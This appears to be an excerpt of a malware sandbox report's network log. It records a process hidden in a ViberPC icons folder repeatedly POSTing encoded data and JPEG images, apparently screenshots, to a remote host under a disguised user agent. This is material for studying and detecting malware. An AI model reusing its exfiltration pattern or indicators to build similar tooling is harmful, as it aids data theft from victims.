                                                                                                      2021-09-15 11:46:45 UTC2849OUTData Raw: 30 16 8a 4a 28 01 69 29 68 a0 04 a2 8a 28 00 a2 8a 28 01 68 a4 a2 80 16 96 9b 4b 40 85 a4 a2 8a 00 5c d1 49 45 00 2d 14 94 50 02 d1 45 14 00 b4 52 52 d3 10 52 d2 51 4c 02 8a 28 a4 01 45 14 50 01 45 14 50 01 4b 49 45 00 2d 14 94 b4 c0 28 a2 8a 04 2d 14 94 50 02 d1 49 45 00 2d 14 94 50 02 d1 45 14 00 51 45 14 c4 2d 25 14 50 02 d1 45 14 00 51 45 14 00 51 45 14 00 b4 52 0a 5a 62 0a 5a 4a 33 40 0b 45 26 68 a0 05 a3 34 94 50 02 e6 8a 4a 5a 04 14 51 45 00 14 b4 94 b4 c0 29 69 28 a0 05 ef 45 14 50 01 45 25 2d 30 16 8a 4a 28 10 b4 52 52 d0 02 d1 49 45 31 0b 45 14 50 02 d2 51 9a 28 01 68 a2 8a 00 29 69 28 a0 05 a0 52 52 d3 10 b4 66 92 8a 62 17 34 66 92 8a 00 76 68 a6 d2 d1 70 b0 b4 66 93 34 99 a2 e1 61 d9 a3 34 dc d1 45 c2 c3 f3 46 69 b4 66 9d c5 61 d9 a4 cd 36 97
                                                                                                      Data Ascii: 0J(i)h((hK@\IE-PERRRQL(EPEPKIE-(-PIE-PEQE-%PEQEQERZbZJ3@E&h4PJZQE)i(EPE%-0J(RRIE1EPQ(h)i(RRfb4fvhpf4a4EFifa6
                                                                                                      2021-09-15 11:46:45 UTC2860OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 36 36 37 33 39 38 31 36 34 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------2667398164--
                                                                                                      2021-09-15 11:46:45 UTC2860INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:45 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=95c8eef47be40b461fa65fa0ce34dbbc096bd99e0323a8e15a95747c4c938bb4; expires=Thu, 15-Sep-2022 11:46:45 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:45 UTC2860INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      37192.168.2.34982845.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:46 UTC2860OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76622
                                                                                                      Content-Type: multipart/form-data; boundary=--------2156489369
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:46 UTC2861OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 31 35 36 34 38 39 33 36 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------2156489369Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:46 UTC2861OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 ea d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:46:46 UTC2861OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:46 UTC2877OUTData Raw: 23 06 a5 ff 00 5f 52 ff 00 e8 66 bd 99 4d 78 ce bd ff 00 23 06 a5 ff 00 5f 52 ff 00 e8 66 bd 0c b3 e2 91 cb 8b d9 14 29 69 29 6b d9 38 82 8c 51 45 02 0c 57 a7 fc 29 e3 49 be ff 00 ae e3 ff 00 41 af 30 af 4e f8 55 ff 00 20 9b ef fa ee 3f f4 1a ce af c2 69 4f e2 3b aa 4a c9 b1 b5 81 f4 9b 6b 9b 99 ee b2 d0 2c 92 39 bb 94 0f ba 09 3f 7a ac a5 85 ac 91 ab c7 35 d3 2b 0c 82 2f 25 c1 1f f7 d5 62 e3 14 f7 fc 3f e0 9a 29 49 ad bf 1f f8 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02
                                                                                                      Data Ascii: #_RfMx#_Rf)i)k8QEW)IA0NU ?iO;Jk,9?z5+/%b?)IMR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4wh
                                                                                                      2021-09-15 11:46:46 UTC2893OUTData Raw: df f0 c8 a9 28 a2 b5 31 16 8a 4a 5a 00 28 a2 8a 04 2d 14 94 b4 80 28 a2 8a 04 14 b4 94 b4 80 29 69 29 45 02 14 52 d2 52 d2 10 b5 62 06 e8 2a b5 4d 6f f7 aa 25 b1 a5 27 69 1a fa b1 c7 86 87 bb 57 12 fd 6b b3 d6 78 f0 d2 7f bd 5c 5b 9e 6b 1c 2f c0 fd 4f 52 bf c6 bd 0e f4 71 e1 db 2f a0 aa 39 ab ad c7 87 ec 47 fb 23 f9 55 1a e7 a3 d7 d4 d3 10 fd e5 e8 2e 68 cd 25 25 6c 73 dc 76 69 43 53 45 14 58 13 1f 93 4e dc 7d 69 82 96 a5 a2 d3 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09
                                                                                                      Data Ascii: (1JZ(-()i)ERRb*Mo%'iWkx\[k/ORq/9G#U.h%%lsviCSEXN}id81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R
                                                                                                      2021-09-15 11:46:46 UTC2909OUTData Raw: d4 b4 f8 ff 00 d5 da 93 f5 a4 3a e0 5f f5 56 b1 8f ad 1e d2 a3 da 21 ec 29 ad e4 54 5b 49 db a4 67 f2 ab 76 9a 6d c7 9a 18 a1 eb 51 b6 bb 74 7e e8 45 fa 0a 62 6a b7 8f 22 e6 53 82 7b 0a 99 2a cd 1a 53 54 23 25 bb 2e 78 cd 76 c3 6a 0f a5 72 fa 7f fc 84 6d ff 00 eb a2 d7 4d e3 12 5a da d0 9e a5 6b 99 d3 ff 00 e4 23 6f ff 00 5d 07 f3 a5 87 fe 01 d7 5b f8 c7 a1 6a 29 6e 66 0d 34 a1 4e 3a 55 23 36 9b 1f 57 26 ab 78 90 91 7a b8 3f c3 58 bd 7b d6 14 28 73 41 36 c9 c4 e3 39 2a 38 a8 9d 01 d4 f4 f4 fb 91 13 4c 3a e4 4b fe ae dc 56 15 15 ba c2 c3 a9 c8 f1 f5 7a 1b 0d af cd fc 11 a8 a8 1f 59 bb 6e 8d 8f a5 67 51 54 b0 f4 d7 43 27 8b ac fa 96 db 50 b9 7f bd 2b 7e 74 df 3a 46 ea e4 fe 35 5e 9c b5 7e ce 2b 64 4a ad 37 bb 25 dc 4f 52 69 73 4d 14 b4 ac 5a 93 63 a9 c2 9b
                                                                                                      Data Ascii: :_V!)T[IgvmQt~Ebj"S{*ST#%.xvjrmMZk#o][j)nf4N:U#6W&xz?X{(sA69*8L:KVzYngQTC'P+~t:F5^~+dJ7%ORisMZc
                                                                                                      2021-09-15 11:46:46 UTC2925OUTData Raw: a0 05 a5 a6 d2 d0 21 69 28 a2 80 17 34 52 51 40 0b 45 25 14 00 b4 51 45 00 2d 14 94 b4 c4 14 b4 94 53 00 a2 8a 29 00 51 45 14 00 51 45 14 00 52 d2 51 40 0b 45 25 2d 30 0a 28 a2 81 0b 45 25 14 00 b4 52 51 40 0b 45 25 14 00 b4 51 45 00 14 51 45 31 0b 49 45 14 00 b4 51 45 00 14 51 45 00 14 51 45 00 2d 14 82 96 98 82 96 92 8c d0 02 d1 49 9a 28 01 68 cd 25 14 00 b9 a2 92 96 81 05 14 51 40 05 2d 25 2d 30 0a 5a 4a 28 01 7b d1 45 14 00 51 49 4b 4c 05 a2 92 8a 04 2d 14 94 b4 00 b4 52 51 4c 42 d1 45 14 00 b4 94 66 8a 00 5a 28 a2 80 0a 5a 4a 28 01 68 14 94 b4 c4 2d 19 a4 a2 98 85 cd 19 a4 a2 80 1d 9a 29 b4 b4 5c 2c 2d 19 a4 cd 26 68 b8 58 76 68 cd 37 34 51 70 b0 fc d1 9a 6d 19 a7 71 58 76 69 33 4d a5 cd 2b 8e c2 e6 97 34 da 4c d1 70 b0 ea 33 49 9a 28 b8 58 76 69 0d
                                                                                                      Data Ascii: !i(4RQ@E%QE-S)QEQERQ@E%-0(E%RQ@E%QEQE1IEQEQEQE-I(h%Q@-%-0ZJ({EQIKL-RQLBEfZ(ZJ(h-)\,-&hXvh74QpmqXvi3M+4Lp3I(Xvi
                                                                                                      2021-09-15 11:46:46 UTC2935OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 31 35 36 34 38 39 33 36 39 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------2156489369--
                                                                                                      2021-09-15 11:46:47 UTC2935INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:46 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=7f6e6f1c3f4eb8b5923f86e1d66b2231ae7327e56c8929b4a31c431b6ba531d9; expires=Thu, 15-Sep-2022 11:46:46 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:47 UTC2936INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      38192.168.2.34982945.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:47 UTC2936OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76630
                                                                                                      Content-Type: multipart/form-data; boundary=--------271647860
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:47 UTC2936OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 37 31 36 34 37 38 36 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------271647860Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:47 UTC2936OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 e0 d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:46:47 UTC2936OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:47 UTC2952OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:46:47 UTC2968OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:46:47 UTC2984OUTData Raw: 93 8a 78 8d cf 01 49 fc 2b 44 ea 5a 7c 7f ea ed 49 fa d2 1d 70 2f fa ab 58 c7 d6 8f 69 51 ed 10 f6 14 d6 f2 2a 2d a4 ed d2 33 f9 55 bb 4d 36 e3 cd 0c 50 f5 a8 db 5d ba 3f 74 22 fd 05 31 35 5b c7 91 73 29 c1 3d 85 4c 95 66 8d 29 aa 11 92 dd 97 3c 66 bb 61 b5 07 d2 b9 7d 3f fe 42 36 ff 00 f5 d1 6b a6 f1 89 2d 6d 68 4f 52 b5 cc e9 ff 00 f2 11 b7 ff 00 ae 83 f9 d2 c3 ff 00 00 eb ad fc 63 d0 b5 14 b7 33 06 9a 50 a7 1d 2a 91 9b 4d 8f ab 93 55 bc 48 48 bd 5c 1f e1 ac 5e bd eb 0a 14 39 a0 9b 64 e2 71 9c 95 1c 54 4e 80 ea 7a 7a 7d c8 89 a6 1d 72 25 ff 00 57 6e 2b 0a 8a dd 61 61 d4 e4 78 fa bd 0d 86 d7 e6 fe 08 d4 54 0f ac dd b7 46 c7 d2 b3 a8 aa 58 7a 6b a1 93 c5 d6 7d 4b 6d a8 5c bf de 95 bf 3a 6f 9d 23 75 72 7f 1a af 4e 5a bf 67 15 b2 25 56 9b dd 92 ee 27 a9 34
                                                                                                      Data Ascii: xI+DZ|Ip/XiQ*-3UM6P]?t"15[s)=Lf)<fa}?B6k-mhORc3P*MUHH\^9dqTNzz}r%Wn+aaxTFXzk}Km\:o#urNZg%V'4
                                                                                                      2021-09-15 11:46:47 UTC3000OUTData Raw: 45 00 14 51 45 00 2d 14 94 50 02 d2 d3 69 68 10 b4 94 51 40 0b 9a 29 28 a0 05 a2 92 8a 00 5a 28 a2 80 16 8a 4a 5a 62 0a 5a 4a 29 80 51 45 14 80 28 a2 8a 00 28 a2 8a 00 29 69 28 a0 05 a2 92 96 98 05 14 51 40 85 a2 92 8a 00 5a 29 28 a0 05 a2 92 8a 00 5a 28 a2 80 0a 28 a2 98 85 a4 a2 8a 00 5a 28 a2 80 0a 28 a2 80 0a 28 a2 80 16 8a 41 4b 4c 41 4b 49 46 68 01 68 a4 cd 14 00 b4 66 92 8a 00 5c d1 49 4b 40 82 8a 28 a0 02 96 92 96 98 05 2d 25 14 00 bd e8 a2 8a 00 28 a4 a5 a6 02 d1 49 45 02 16 8a 4a 5a 00 5a 29 28 a6 21 68 a2 8a 00 5a 4a 33 45 00 2d 14 51 40 05 2d 25 14 00 b4 0a 4a 5a 62 16 8c d2 51 4c 42 e6 8c d2 51 40 0e cd 14 da 5a 2e 16 16 8c d2 66 93 34 5c 2c 3b 34 66 9b 9a 28 b8 58 7e 68 cd 36 8c d3 b8 ac 3b 34 99 a6 d2 e6 95 c7 61 73 4b 9a 6d 26 68 b8 58 75
                                                                                                      Data Ascii: EQE-PihQ@)(Z(JZbZJ)QE(()i(Q@Z)(Z((Z(((AKLAKIFhhf\IK@(-%(IEJZZ)(!hZJ3E-Q@-%JZbQLBQ@Z.f4\,;4f(X~h6;4asKm&hXu
                                                                                                      2021-09-15 11:46:47 UTC3011OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 37 31 36 34 37 38 36 30 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------271647860--
                                                                                                      2021-09-15 11:46:48 UTC3011INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:47 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=6049f450a86c7a1730d09b84265de356cceeec30170fdc33e04fe3cc32d18290; expires=Thu, 15-Sep-2022 11:46:47 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:48 UTC3011INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      39192.168.2.34983045.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:49 UTC3011OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76597
                                                                                                      Content-Type: multipart/form-data; boundary=--------2981659231
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:49 UTC3012OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 39 38 31 36 35 39 32 33 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------2981659231Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:49 UTC3012OUTData Raw: 7f 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 e7 d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee 98 ef 4d 77 7d 78 7d 40 d3 6d 60 3b ea 5f 32 bb b0
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[DMw}x}@m`;_2
                                                                                                      2021-09-15 11:46:49 UTC3012OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
